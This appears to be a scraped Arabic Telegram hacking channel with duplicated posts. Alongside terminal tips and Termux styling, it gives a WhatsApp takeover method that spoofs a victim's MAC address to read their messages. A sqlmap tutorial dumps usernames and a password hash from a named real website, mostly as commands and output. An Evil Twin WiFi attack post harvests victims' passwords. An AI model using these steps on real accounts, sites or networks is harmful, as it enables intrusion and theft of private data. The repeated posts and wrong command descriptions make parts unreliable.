تثبيت اداة
KnockPy
Installation :
$ apt update && apt upgrade
$ apt install git
$ apt install python2
$ apt install python
$ pip2 install dnspython
$ git clone https://github.com/guelfoweb/knock.git
$ cd knock $ python2 setup.py install
تشغيل الاداة
$ knockpy -h
KnockPy
Installation :
$ apt update && apt upgrade
$ apt install git
$ apt install python2
$ apt install python
$ pip2 install dnspython
$ git clone https://github.com/guelfoweb/knock.git
$ cd knock $ python2 setup.py install
تشغيل الاداة
$ knockpy -h
GitHub
GitHub - guelfoweb/knockpy: Knock Subdomain Scan
Knock Subdomain Scan. Contribute to guelfoweb/knockpy development by creating an account on GitHub.
اوامر Terminal مفيدة للمطورين
الـ Terminal يعتبر من اقوى الادوات التي اذا اتقنت استخدامها وتعاملت معها بالشكل المطلوب فإنها ستسرع عملك, وتعتبر اسرع بمراحل من الواجهات الرسومية GUI لكثير من البرامج, لذلك في هذه المقالة ساقوم بسرد بعض الاوامر المفيدة والتي تعتبر الاكثر استخداماً وشيوعاً بين المطورين.
فتح ملف بواسطة المتصفح
1
open index.html
هذا الاختصار سيفتح لك اي ملف في المتصفح الافتراضي لجهازك, سواء كان الـ Safari or Chrome.
إنشاء ملف جديد
1
2
touch index.html
touch one.html two.html three.html
من افضل الطرق لإنشاء ملف او عدة ملفات في مجلد ما.
إنشاء مجلد جديد
1
mkdir test && cd $_
اختصار بسيط يقوم بإنشاء مجلد جديد وينقلك لداخله مباشرة.
عرض محتويات الملف
1
less index.html
يوجد عدة طرق لعرض محتويات اي ملف ولكن اسهلها هو باستخدام الامر less فمن خلال هذا الامر تستطيع عرض محتويات الملف وتستطيع استخدام الامر b و f لانتقال بين اسطر الملف وايضا تستطيع استخدام الامر / للبحث عن عبارة معينه او استخدم q للخروج من الملف.
فتح مجلد في finder (لمستخدمين Mac)
1
open .
امر بسيط تستطيع من خلاله فتح اي مجلد في مستعرض الملفات (Finder) .
تحميل ملف باستخدام Crul
1
curl -O http://www.domain.com/path/to/download.tar.gz
امر بسيط تستطيع من خلاله تحميل اي ملف بدون استخدام المتصفح.
عرض تفاصيل اي امر
1
man ls
من خلال امر man تستطيع عرض تفاصيل اي امر مع شرح مبسط له وطريقة استخدامه.
سِجل الاوامر المدخلة
1
history
اثناء استخدامك للـ Terminal قد تستخدم العديد من الاومر فإذا اردت الرجوع الى اي امر واردت مشاهدة سِجل لجميع الاوامر التي قمت بكتابتها فقط استخدم الامر history
حذف محتويات الملف
1
<em class="markup--em markup--pre-em">cat /dev/null > test.html</em>
هذا الامر يسمح لك بحذف جميع محتويات الملف ولكن بدون حذف الملف نفسه, بمعنى اخر سيقوم بجعل الملف فارغ.
ترتيب الملفات بناء على الحجم
1
ls -lSr
امر بسيطة لترتيب او عرض قائمة الملفات ومرتبه بحسب الحجم.
عرض المجلدات فقط
1
ls -d */
ان كان لديك مجلد وبداخله مجموعة مجلدات وملفات وتريد عرض المجلدات فقط فاستخدم الامر السابق.
تفريغ الـ Terminal
1
clear
الامر clear يحذف جميع الاومر الموجودة في نافذة الـ Terminal الحالية.
انشاء عدة ملفات بامتداد واحد
1
touch {user,age,location,height}.js
اذا اردت انشاء مجموعة ملفات تحمل امتداد واحد ولتكن مثلا .php او .js فتستطيع استخدام الطريقة السابقة.
فتح ملف باستخدام Sublime
1
subl index.html
برنامج Sublime الغني عن التعريف هو من اجمل المحررات لمختلف اللغات, فاذا اردت فتح اي ملف باستخدامه فقط قم بكتابة الامر subl وبعدها اسم الملف ( طريقة اعداده )
الـ Terminal يعتبر من اقوى الادوات التي اذا اتقنت استخدامها وتعاملت معها بالشكل المطلوب فإنها ستسرع عملك, وتعتبر اسرع بمراحل من الواجهات الرسومية GUI لكثير من البرامج, لذلك في هذه المقالة ساقوم بسرد بعض الاوامر المفيدة والتي تعتبر الاكثر استخداماً وشيوعاً بين المطورين.
فتح ملف بواسطة المتصفح
1
open index.html
هذا الاختصار سيفتح لك اي ملف في المتصفح الافتراضي لجهازك, سواء كان الـ Safari or Chrome.
إنشاء ملف جديد
1
2
touch index.html
touch one.html two.html three.html
من افضل الطرق لإنشاء ملف او عدة ملفات في مجلد ما.
إنشاء مجلد جديد
1
mkdir test && cd $_
اختصار بسيط يقوم بإنشاء مجلد جديد وينقلك لداخله مباشرة.
عرض محتويات الملف
1
less index.html
يوجد عدة طرق لعرض محتويات اي ملف ولكن اسهلها هو باستخدام الامر less فمن خلال هذا الامر تستطيع عرض محتويات الملف وتستطيع استخدام الامر b و f لانتقال بين اسطر الملف وايضا تستطيع استخدام الامر / للبحث عن عبارة معينه او استخدم q للخروج من الملف.
فتح مجلد في finder (لمستخدمين Mac)
1
open .
امر بسيط تستطيع من خلاله فتح اي مجلد في مستعرض الملفات (Finder) .
تحميل ملف باستخدام Crul
1
curl -O http://www.domain.com/path/to/download.tar.gz
امر بسيط تستطيع من خلاله تحميل اي ملف بدون استخدام المتصفح.
عرض تفاصيل اي امر
1
man ls
من خلال امر man تستطيع عرض تفاصيل اي امر مع شرح مبسط له وطريقة استخدامه.
سِجل الاوامر المدخلة
1
history
اثناء استخدامك للـ Terminal قد تستخدم العديد من الاومر فإذا اردت الرجوع الى اي امر واردت مشاهدة سِجل لجميع الاوامر التي قمت بكتابتها فقط استخدم الامر history
حذف محتويات الملف
1
<em class="markup--em markup--pre-em">cat /dev/null > test.html</em>
هذا الامر يسمح لك بحذف جميع محتويات الملف ولكن بدون حذف الملف نفسه, بمعنى اخر سيقوم بجعل الملف فارغ.
ترتيب الملفات بناء على الحجم
1
ls -lSr
امر بسيطة لترتيب او عرض قائمة الملفات ومرتبه بحسب الحجم.
عرض المجلدات فقط
1
ls -d */
ان كان لديك مجلد وبداخله مجموعة مجلدات وملفات وتريد عرض المجلدات فقط فاستخدم الامر السابق.
تفريغ الـ Terminal
1
clear
الامر clear يحذف جميع الاومر الموجودة في نافذة الـ Terminal الحالية.
انشاء عدة ملفات بامتداد واحد
1
touch {user,age,location,height}.js
اذا اردت انشاء مجموعة ملفات تحمل امتداد واحد ولتكن مثلا .php او .js فتستطيع استخدام الطريقة السابقة.
فتح ملف باستخدام Sublime
1
subl index.html
برنامج Sublime الغني عن التعريف هو من اجمل المحررات لمختلف اللغات, فاذا اردت فتح اي ملف باستخدامه فقط قم بكتابة الامر subl وبعدها اسم الملف ( طريقة اعداده )
👍3
بسم الله الرحمن الرحيم والسلام علىكم ورحمة الله تعالى وبركاته الًيَوُمًِ معنا شرح اختراق الوتساب عن طريق برنامج Terminal Emulator
إن تطبيقات المليار مشترك أو مستخدم كالفيسبوك والواتساب والتي تحتل المراكز الأولى في مواقع التواصل الإجتماعي ليس لها حماية شاملة وفي أية لحظة تتعرض لثغرة لهذا في هذا الدرس سوف نتعرف على طريقة إختراق الواتساب بطريقة سهلة جدا فقط تابع الشرح
الطريقة الأولى
في هذه المرحلة نحتاج الـ MAC address لهاتف الضحية وبرنامج BusyBox app و Terminal emulator. التطبيقات توجد في متجر PLAY وعند تثبيت المتطلبات الثلاث فأنت جاهز لبدء العملية القرصنة.
قم بتحميل وتثبيت BusyBox app وسيطلب منك عمل حساب. قم بعمل الحساب ثم الدخول
أدخل الى جهاز الضحية وخذ الـ MAC address بالطريقة التالية : “Settings> About Phone> Status> MAC Address.
الآن سنقوم بإستخدام Terminal emulator.
افتح Terminal emulator وقم بكتابة $ su. ثم اضغط ENTER
2. ثم اكتب “$ busybox iplink show eth0 ″ ثم ENTER
اذا حصلت على هذه الرسالة “device not found” , اكتب wlan0 instead of eth0 في المساحة المتاحة
3. في الخطوة التالية اكتب “$ busybox ifconfig eth0 hw ether” وبعدها اكتب الـ MAC address بهذا الشكل XX:XX:XX:XX:XX:XX الآن لتتأكد من أن عملية الاختراق على أنها جرت بشكل صحيح اذهب الى الواتساب وقم بتسجيل رقم الضحية الخاص بحسابه على واتساب ومن ثم اطلب التأكيد من خلال مكالمة تأكيد (call verification) واكتب الكود المعطى وقم بادخاله وستسطيع استقبال الرسائل القادمة اليه والاطلاع على جميع رسائله.
إن تطبيقات المليار مشترك أو مستخدم كالفيسبوك والواتساب والتي تحتل المراكز الأولى في مواقع التواصل الإجتماعي ليس لها حماية شاملة وفي أية لحظة تتعرض لثغرة لهذا في هذا الدرس سوف نتعرف على طريقة إختراق الواتساب بطريقة سهلة جدا فقط تابع الشرح
الطريقة الأولى
في هذه المرحلة نحتاج الـ MAC address لهاتف الضحية وبرنامج BusyBox app و Terminal emulator. التطبيقات توجد في متجر PLAY وعند تثبيت المتطلبات الثلاث فأنت جاهز لبدء العملية القرصنة.
قم بتحميل وتثبيت BusyBox app وسيطلب منك عمل حساب. قم بعمل الحساب ثم الدخول
أدخل الى جهاز الضحية وخذ الـ MAC address بالطريقة التالية : “Settings> About Phone> Status> MAC Address.
الآن سنقوم بإستخدام Terminal emulator.
افتح Terminal emulator وقم بكتابة $ su. ثم اضغط ENTER
2. ثم اكتب “$ busybox iplink show eth0 ″ ثم ENTER
اذا حصلت على هذه الرسالة “device not found” , اكتب wlan0 instead of eth0 في المساحة المتاحة
3. في الخطوة التالية اكتب “$ busybox ifconfig eth0 hw ether” وبعدها اكتب الـ MAC address بهذا الشكل XX:XX:XX:XX:XX:XX الآن لتتأكد من أن عملية الاختراق على أنها جرت بشكل صحيح اذهب الى الواتساب وقم بتسجيل رقم الضحية الخاص بحسابه على واتساب ومن ثم اطلب التأكيد من خلال مكالمة تأكيد (call verification) واكتب الكود المعطى وقم بادخاله وستسطيع استقبال الرسائل القادمة اليه والاطلاع على جميع رسائله.
السلام عليكم 📢
اليوم ضمن شروحات تيرموكس - TERMUX
' تغيير واجهة التيرموكس واضافة ستايلات واسمك على خلفية الواجهة
تابع...
- @Cyper_Th
----
خطوة الاولى : نقوم بتحميل تطبيق TERMUX - STYLE ساقوم بوضعه اسفل الشرح تقوم بتحميله وتثبيته
خطوة الثانية : نقوم بدخول الى التيرموكس وكتابة هذه الاوامر لتحميل اداوات لازمة
تابع...
1- pkg install cowsay
2- pkg install nano
3- pkg install toilet
خطوة الثالثة : قم بالخروج من تطبيق تيرموكس ثم قم بدخول اليه مرة اخرى
خطوة الرابعة : تقوم بكتابة هذه الاوامر بالحرف لا تنقص منه حرف
تابع الخطوات ....
1- cd ..
2- cd usr
3- cd etc
4- nano bash.bashrc
----
/data/data/com.termux/files/usr/libexec/termux/comm$
}
سيظهر لك بهذا الشكل 👆
تقوم بضغط انتر مرتين عند اشارة }
وتكتب
clear
ثم قم بضغط انتر مرتين وكتابة هذا الامر
toilet -f standard -F gay ARMANDO
بدال ( name ) اكتب الاسم الذي تريده👆✅
ثم قم بضغط انتر مرتين وكتابة الامر الثاني
cowsay -f eyes V_J_S_ARMANDO
بدال ( name ) اكتب اسم الذي تريده👆✅
وثم قم بضغط على زر خفض الصوت بهاتفك مع حرف الx
وسيطلب منك الحفظ قم بضغط حرف y وثم انتر
والان يمكنك خروج من تطبيق ودخول اليه مرة اخرى سترى ان الواجهة تغيرت وفيها اشكال رائعة مع اسمك
والان يمكنك تغيير لون الاحرف وايضا شكل الاحرف او الfont
عبر الضغط مطولا على شاشة وثم ضغط على more وسيظهر لك كلمة style بالاسفل قم بضغط عليه ومن خلاله يمكنك تغيير لون الاحرف وايضا شكل الخط FONT باجمل ستايلات ...
تحميل تطبيق termux-style 📥
https://up.top4top.net/downloadf-8685vf7v1-apk.html
----
وهكذا انتهينا من الشرح نتمنى انكم استفدتم من الشرح
اليوم ضمن شروحات تيرموكس - TERMUX
' تغيير واجهة التيرموكس واضافة ستايلات واسمك على خلفية الواجهة
تابع...
- @Cyper_Th
----
خطوة الاولى : نقوم بتحميل تطبيق TERMUX - STYLE ساقوم بوضعه اسفل الشرح تقوم بتحميله وتثبيته
خطوة الثانية : نقوم بدخول الى التيرموكس وكتابة هذه الاوامر لتحميل اداوات لازمة
تابع...
1- pkg install cowsay
2- pkg install nano
3- pkg install toilet
خطوة الثالثة : قم بالخروج من تطبيق تيرموكس ثم قم بدخول اليه مرة اخرى
خطوة الرابعة : تقوم بكتابة هذه الاوامر بالحرف لا تنقص منه حرف
تابع الخطوات ....
1- cd ..
2- cd usr
3- cd etc
4- nano bash.bashrc
----
/data/data/com.termux/files/usr/libexec/termux/comm$
}
سيظهر لك بهذا الشكل 👆
تقوم بضغط انتر مرتين عند اشارة }
وتكتب
clear
ثم قم بضغط انتر مرتين وكتابة هذا الامر
toilet -f standard -F gay ARMANDO
بدال ( name ) اكتب الاسم الذي تريده👆✅
ثم قم بضغط انتر مرتين وكتابة الامر الثاني
cowsay -f eyes V_J_S_ARMANDO
بدال ( name ) اكتب اسم الذي تريده👆✅
وثم قم بضغط على زر خفض الصوت بهاتفك مع حرف الx
وسيطلب منك الحفظ قم بضغط حرف y وثم انتر
والان يمكنك خروج من تطبيق ودخول اليه مرة اخرى سترى ان الواجهة تغيرت وفيها اشكال رائعة مع اسمك
والان يمكنك تغيير لون الاحرف وايضا شكل الاحرف او الfont
عبر الضغط مطولا على شاشة وثم ضغط على more وسيظهر لك كلمة style بالاسفل قم بضغط عليه ومن خلاله يمكنك تغيير لون الاحرف وايضا شكل الخط FONT باجمل ستايلات ...
تحميل تطبيق termux-style 📥
https://up.top4top.net/downloadf-8685vf7v1-apk.html
----
وهكذا انتهينا من الشرح نتمنى انكم استفدتم من الشرح
top4top.io
8685vf7v1.apk | تحميل
مركز رفع و تحميل صور وملفات صوتية ومرئية بروابط مباشرة وأحجام ضخمة للأبد مع إمكانية إدارة ملفاتك، من الأشهر على مستوى الخليج والعالم العربي
ls /system/bin am
2- أوامر خاصة بتشغيل الصوتيات:
amix aplay
3-أوامر خاصة بالتسجيل الصوتي:
arec
4- مدير النسخ الاحتياطي - نوع الأمر في حد ذاته للحصول على الوثائق
bmgr
5-تغيير تاثيرات اقلاع الهاتف/ قد يحتم عليك اعادة تشغيل الاندرويد:
bootanimation
6-انسخ محتويات الملف إلى الإخراج القياسي
brcm_patchram_plus
bugreport
cat
7- تغيير صيغة الملف (على سبيل المثال، ما إذا كان يمكن mp3 أو txt.)
chmod
8-مقارنة ملفين :
cmp
9- اظهار التاريخ والوقت الحالي تلقائيا:
Date
7-ادارة جميع مساحات الداكرة الموجودة :
debuggerd
dexopt
df
8-اظهار الاعدادات الصحيحة للشبكات (البلوتوت ,الواي فاي ...)
dhcpcd dmesg dnsmasq dumpstate dumpsys dvz fsck_msdos gdbserver getevent getprop gzip hciattach hd id ifconfig
9- إظهار العمليات الحالية باستخدام واجهات الشبكة (أعلى، ولكن للشبكات)
iftop
10-إدارة جدار الحماية :
ime input insmod installd ioctl ionice iptables
11-إرسال إشارات إلى العمليات:
keystore
keystore_cli
kill
12-قائمة الملفات:
logwrapper
ls
13-قائمة العمليات النشطة:
nandread ndc netcfg netd netstat newfs_msdos notify omx_tests pand ping pm pppd printenv ps
14-التحكم بوضعية الجهاز :
qemu-props qemud racoon radiooptions reboot
15-اعداد وقت الايقاف و التشغيل التلقائي لوظائف الاندرويد:
rmmod route rtp_test run-as schedtest schedtop sdcard sdptool sendevent service servicemanager setconsole setprop setup_fs sh showlease sleep smd stagefright start
16-اظهار اكثر المستهلكات للمعالج:
surfaceflinger svc sync system_server tc testid3 toolbox top
2- أوامر خاصة بتشغيل الصوتيات:
amix aplay
3-أوامر خاصة بالتسجيل الصوتي:
arec
4- مدير النسخ الاحتياطي - نوع الأمر في حد ذاته للحصول على الوثائق
bmgr
5-تغيير تاثيرات اقلاع الهاتف/ قد يحتم عليك اعادة تشغيل الاندرويد:
bootanimation
6-انسخ محتويات الملف إلى الإخراج القياسي
brcm_patchram_plus
bugreport
cat
7- تغيير صيغة الملف (على سبيل المثال، ما إذا كان يمكن mp3 أو txt.)
chmod
8-مقارنة ملفين :
cmp
9- اظهار التاريخ والوقت الحالي تلقائيا:
Date
7-ادارة جميع مساحات الداكرة الموجودة :
debuggerd
dexopt
df
8-اظهار الاعدادات الصحيحة للشبكات (البلوتوت ,الواي فاي ...)
dhcpcd dmesg dnsmasq dumpstate dumpsys dvz fsck_msdos gdbserver getevent getprop gzip hciattach hd id ifconfig
9- إظهار العمليات الحالية باستخدام واجهات الشبكة (أعلى، ولكن للشبكات)
iftop
10-إدارة جدار الحماية :
ime input insmod installd ioctl ionice iptables
11-إرسال إشارات إلى العمليات:
keystore
keystore_cli
kill
12-قائمة الملفات:
logwrapper
ls
13-قائمة العمليات النشطة:
nandread ndc netcfg netd netstat newfs_msdos notify omx_tests pand ping pm pppd printenv ps
14-التحكم بوضعية الجهاز :
qemu-props qemud racoon radiooptions reboot
15-اعداد وقت الايقاف و التشغيل التلقائي لوظائف الاندرويد:
rmmod route rtp_test run-as schedtest schedtop sdcard sdptool sendevent service servicemanager setconsole setprop setup_fs sh showlease sleep smd stagefright start
16-اظهار اكثر المستهلكات للمعالج:
surfaceflinger svc sync system_server tc testid3 toolbox top
👍2
شرح اختراق مواقع بستعمال sqlmap
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
الكل يعرف انه ثغرات sql
من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة
اسم الأداة :sqlmap
لغة البرمجة : python
الأن كيفية استخدام الاداة في عملية الحقن
اولا : استخراج اسماء قواعد البيانات
لنقل ان هذا الموقع مصاب بثغرة sql
كود:
http://www.bcspeakers.com/page.php?id=22
وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصاب
الأن الأمر المستخدم في استخراج القواعد لهذا الموقع
كود:
python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs
النتيجة
كود:
available databases [2]:
[*] information_schema
[*] www-bcspeakerstest
مثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة هي " www-bcspeakerstest"
ثانيا : استخراج الجداول
القاعدة المستهدفة هي " www-bcspeakerstest"
سوف يكون الأمر بهذا الشكل
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables
والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل حال انا وجدت الجدول المستهدف وهو "_user"
ثالثا : استخراج الأعمدة
الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user"
الكود كالتالي
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user --columns
والنتيجة كالتالي
كود:
+----------+---------------------------+
| Column | Type |
+----------+---------------------------+
| id_user | int(10) unsigned zerofill |
| password | text |
| username | text |
+----------+---------------------------+
كما ترون الأعمدة المستهدفة هي
password
username
رابعا : اسخراج البيانات من الاعمدة
العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump
النتيجة
كود:
+--------------+
| username |
+--------------+
| becspeak2803 |
| becspeak2803 |
+--------------+
كما ترون استخرجنا اسم المستخدم
والان نأتي الى استخراج الباسورود
اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump
سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداة
كود:
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]
تختار مثل ما نت عاوز
انا اخترت لا لتسريع العملية والنتيجة كالتالي
كود:
+----------------------------------+
| password |
+----------------------------------+
| 286adae502ad9d5ab8c4f8644050b448 |
| 286adae502ad9d5ab8c4f8644050b448 |
+----------------------------------+
كما ترون تم استخراج البيانات بسرعة كبيرة
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
الكل يعرف انه ثغرات sql
من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة
اسم الأداة :sqlmap
لغة البرمجة : python
الأن كيفية استخدام الاداة في عملية الحقن
اولا : استخراج اسماء قواعد البيانات
لنقل ان هذا الموقع مصاب بثغرة sql
كود:
http://www.bcspeakers.com/page.php?id=22
وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصاب
الأن الأمر المستخدم في استخراج القواعد لهذا الموقع
كود:
python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs
النتيجة
كود:
available databases [2]:
[*] information_schema
[*] www-bcspeakerstest
مثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة هي " www-bcspeakerstest"
ثانيا : استخراج الجداول
القاعدة المستهدفة هي " www-bcspeakerstest"
سوف يكون الأمر بهذا الشكل
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables
والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل حال انا وجدت الجدول المستهدف وهو "_user"
ثالثا : استخراج الأعمدة
الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user"
الكود كالتالي
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user --columns
والنتيجة كالتالي
كود:
+----------+---------------------------+
| Column | Type |
+----------+---------------------------+
| id_user | int(10) unsigned zerofill |
| password | text |
| username | text |
+----------+---------------------------+
كما ترون الأعمدة المستهدفة هي
password
username
رابعا : اسخراج البيانات من الاعمدة
العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump
النتيجة
كود:
+--------------+
| username |
+--------------+
| becspeak2803 |
| becspeak2803 |
+--------------+
كما ترون استخرجنا اسم المستخدم
والان نأتي الى استخراج الباسورود
اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump
سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداة
كود:
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]
تختار مثل ما نت عاوز
انا اخترت لا لتسريع العملية والنتيجة كالتالي
كود:
+----------------------------------+
| password |
+----------------------------------+
| 286adae502ad9d5ab8c4f8644050b448 |
| 286adae502ad9d5ab8c4f8644050b448 |
+----------------------------------+
كما ترون تم استخراج البيانات بسرعة كبيرة
👍1
Forwarded from BLACK HAT ISLAMIC (العميلة X)
هجوم التوأم الشرير هذه الطريقة تمكنك من الهجوم على الشبكه وانشاء شبكه وهمية بنفس اسم واي فاي الضحيه واخفاء الشبكه الأصليه للضحيه ايضا سنقوم ببث نفس اسم الشبكه مما يوهم الضحيه انها نفس شبكة الواي فاي wifi ألأصلية
Forwarded from BLACK HAT ISLAMIC (العميلة X)
وحين دخول الضحيه الى الشبكة سوف تلزمه بكتابه باسوورد الحقيقي للشبكة حتى يستطيع الدخول الى شبكة الواي فاي wifi
وعندما يقوم الضحيه بكتابه الرقم السري لشبكة الwifi سوف يصلك الرقم السري الصحيح وبذالك تستطيع اختراق الشبكة بنجاح
وعندما يقوم الضحيه بكتابه الرقم السري لشبكة الwifi سوف يصلك الرقم السري الصحيح وبذالك تستطيع اختراق الشبكة بنجاح
Forwarded from BLACK HAT ISLAMIC (العميلة X)
هذه الطريقة تحتاج الى نظام Kali Linux
Forwarded from BLACK HAT ISLAMIC (العميلة X)
واداة Airgeddon
Forwarded from BLACK HAT ISLAMIC (العميلة X)
اولا نقوم بفتح الترمنال
Forwarded from BLACK HAT ISLAMIC (العميلة X)
Forwarded from BLACK HAT ISLAMIC (العميلة X)
بعد تثبيت الاداة انتظر بضع دقائق ليقوم بتثبيت بعض الملفات الاضافية
Forwarded from BLACK HAT ISLAMIC (العميلة X)
بعد ذلك ، سيتحقق الأداة من الوصول إلى الإنترنت حتى يمكنه تحديث نفسه في حالة وجود إصدار أحدث. عند الانتهاء من ذلك ، اضغط على Enter لتحديد مهيئ الشبكة المراد استخدامها
Forwarded from BLACK HAT ISLAMIC (العميلة X)
بعد أن نختار الأنترفيس الخاص في الشبكة اللاسلكية الخاص بنا ، سننتقل إلى قائمة الهجوم الرئيسية الأن
Forwarded from BLACK HAT ISLAMIC (العميلة X)
اضغط 2 لوضع كارت الفا ALFA WIFI في وضع الشاشة. بعد ذلك ، حدد الخيار 7 لقائمة Evil Twin attacks وستظهر القائمة الفرعية لوحدة الهجوم